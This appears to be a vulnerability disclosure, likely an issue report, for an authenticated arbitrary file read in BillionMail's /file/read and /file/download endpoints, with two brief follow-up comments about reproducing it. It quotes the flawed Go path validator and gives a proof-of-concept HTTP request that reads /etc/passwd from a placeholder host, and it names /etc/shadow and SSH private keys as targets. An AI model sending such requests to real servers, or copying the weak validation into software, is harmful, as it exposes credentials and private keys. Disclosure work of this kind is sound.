aaPanel
Vulnerability: Arbitrary File Read in BillionMail
The BillionMail application exposes an arbitrary file read vulnerability via the /file/read and /file/download endpoints. An authenticated attacker can supply arbitrary absolute file paths and retrieve the contents of files from the server’s filesystem.
This leads to disclosure of sensitive files such as /etc/passwd, private keys, application configs, and database credentials.
Affected Endpoints
GET /file/readGET /file/download
Both require an Authorization header but insufficiently validate the file_path parameter.
Technical Details
Vulnerable code
The validation function only blocks ./ sequences and exact /:
func (c *ControllerV1) validateFilePath(filePath string) error {
if filePath == "/" {
return gerror.New("Cannot use system root directory")
}
if strings.Contains(filePath, "./") {
return gerror.New("Invalid path parameter")
}
return nil
}
This still allows absolute paths such as /etc/passwd.
The handler then calls:
os.ReadFile(filePath)
without enforcing a safe base directory.
Proof of Concept (PoC)
Request:
GET /file/read?file_path=/etc/passwd HTTP/1.1
Host: target.example.com
Authorization: Bearer <valid_token>
Response (truncated):
{
"success": true,
"code": 0,
"msg": "Success",
"data": "root:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\n..."
}
This confirms full file disclosure.
Impact
- Disclosure of sensitive system files (
/etc/passwd,/etc/shadow,/root/.ssh/id_rsa). - Disclosure of application secrets and configuration files.
which version are you using. I can't seem to reproduce it.
Test on the release version, it has been fixed in the dev branch